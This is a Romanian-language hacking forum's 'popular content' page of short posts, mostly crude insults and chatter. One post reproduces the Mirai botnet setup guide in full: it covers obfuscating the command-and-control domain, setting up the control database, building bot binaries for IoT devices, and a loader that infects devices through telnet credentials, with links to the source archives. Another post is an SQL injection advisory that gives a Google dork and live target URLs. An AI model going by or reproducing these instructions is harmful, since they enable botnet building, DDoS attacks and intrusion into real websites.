Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 02/24/17 in all areas

  1. daca te face cineva zoofil, ii zici ca ai futut o vaca, pe ma-ta.
    4 points
  2. Asta se întâmplă când elevii îs închiși în școli și nu pot chiuli
    2 points
  3. Daca intradevar si profesorii se dau in ceasul mortii si acorda atentie la asemenea prostii meritati sa va umple lumea frigiderul. Ce imagine sa aibe scoala bre? Te-ai gasit tu taman aparatorul imaginii scolii? Lasa-i pe adulti sa se preocupe de asa ceva. Pana una alta muie http://cnunirea.ro/ - Colegiul Național „Unirea” Brașov ! Nu de alta, dar sa dea bine la Goagle!
    2 points
  4. Salutare, e o conferinta de hacking, pe aici pe unde stau eu, la care poti intra decat rezolvand un CTF. Au trecut 3 zile de cand e online si decat baietii de la Follow the White Rabbit (FWHIBBIT), au reusit sa il scoata (2 dintre ei). Daca sunteti in Spania si il scoateti, misto, puteti sa veniti la conferinta. Ca sa nu ziceti ca il pun aici ca sa va pun la munca sa il scoateti si sa ma duc eu la conferinta, daca il scoateti nu spuneti raspunsul pana nu apare write-up -ul si il comparam. Daca vreti sa faceti 100€ ziceti-mi cum ati facut Linkul este asta: https://checkin.faqin.org/ <- this is the start. Eu am ajuns pana la the zone. Si acolo am ramas toti, daca va impolmoliti pana la the zone, spuneti-mi si va dau o mana de ajutor. Have fun!
    1 point
  5. Generatie de retardati, v-au spalat creierele cu facebook, sunteti cel mult niste oi de consum.
    1 point
  6. Aveam un plugin care ajuta, dar a provocat probleme. O sa il incerc din nou cand o sa am timp.
    1 point
  7. The source code that powers the “Internet of Things” (IoT) botnet responsible for launching the historically large distributed denial-of-service (DDoS) attack against KrebsOnSecurity last month has been publicly released, virtually guaranteeing that the Internet will soon be flooded with attacks from many new botnets powered by insecure routers, IP cameras, digital video recorders and other easily hackable devices. The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed “Mirai,” spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords. Full article: https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/
    1 point
  8. ############################################################# # Application Name : SQLi in Dejabú's Scripts # Vulnerable Type : SQL İnjection # Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id= # Author: fl3xpl0it a.k.a KurokoTetsuya # Date: 20.02.2017 # Tested On Demo Sites: [+] http://www.cepaproduccion.com/content/news.php?id=1114' [+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2 # Warning: If you not found SQLi , you try SQLi other parameter. # Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi) # Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected) #############################################################
    1 point
  9. Requirements Infrastructure Overview Configuring Bot Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working. - TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards - TABLE_CNC_PORT - Port to connect to, its set to 23 already - TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to - TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already. In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file Run this inside mirai directory: ./build.sh debug telnet You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won't affect compiling the enc tool Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this: ./debug/enc string fuck.the.police.com The output should look like this: XOR'ing 20 bytes of data... \x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22 To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument as well. So for example, the table.c line originally looks like this: add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com Now that we know value from enc tool, we update it like this: add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com Some values are strings, some are port (uint16 in network order / big endian). Configuring CNC apt-get install mysql-server mysql-client CNC requires database to work. When you install database, go into it and run following commands: http://pastebin.com/86d0iL9g This will create database for you. To add your user: INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ''); Now, go into file ./mirai/cnc/main.go Edit these values: const DatabaseAddr string = "127.0.0.1" const DatabaseUser string = "root" const DatabasePass string = "password" const DatabaseTable string = "mirai" To the information for the mysql server you just installed. Setting Up Cross Compilers Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect. http://pastebin.com/1rRCc3aD Building CNC+Bot The CNC, bot, and related tools: 1) http://santasbigcandycane.cx/mirai.src.zip 2) http://santasbigcandycane.cx/loader.src.zip How to build bot + CNC In mirai folder, there is build.sh script. ./build.sh debug telnet Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder ./build.sh release telnet Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder Building Echo Loader Loader reads telnet entries from STDIN in following format: ip:port user:pass It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub here: http://santasbigcandycane.cx/dlr.src.zip You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow. When you compile, place your dlr.* files into the folder ./bins for the loader ./build.sh Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this: cat file.txt | ./loader E mai usor asa pentru cei ce nu au cont pe hackforums, nu vor sau nu pot sa intre.
    1 point
  10. Aparent cineva a pus sursa si pe Git: https://github.com/jgamblin/Mirai-Source-Code
    1 point
  11. Un oneplus one second hand: https://www.olx.ro/oferta/vand-oneplus-one-de-64gb-ID7Svll.html#b5d7b2b585 Grijă mare să nu aibe yellow tint sau ghosts touches.
    -1 points
  12. Buna seara ! Apelez la voi intr-o situatie `de urgenta`. Vreau sa aflu administratorul unei pagini de facebook. Cum pot ? O portita catre un id de user si sa aflu numele prin id sau ceva ? E vorba de o pagina rau voitoare. Sunt la liceu, si fac parte din consiliul elevilor. S-a facut in aceasta seara o pagina care spune tot felul de lucruri despre elevii din scoala mea. Ideea e ca denigreaza imaginea scolii, iar toata lumea vrea sa afle cine este. Pana in randul profesorilor. Va rog mult sa ma ajutati ! Multumesc, o seara frumoasa ! https://www.facebook.com/Gossip-Girl-CNU-845240078947576/ Aceasta este pagina, va rog mult daca se poate sa ma ajutati. Nu stiu daca este cazul de plangere la politie, dar ar fi de folos ceva pentru a gasi administratorul, ca astfel ne dam seama cine e si se pot lua masuri interne
    -2 points
×
×
  • Create New...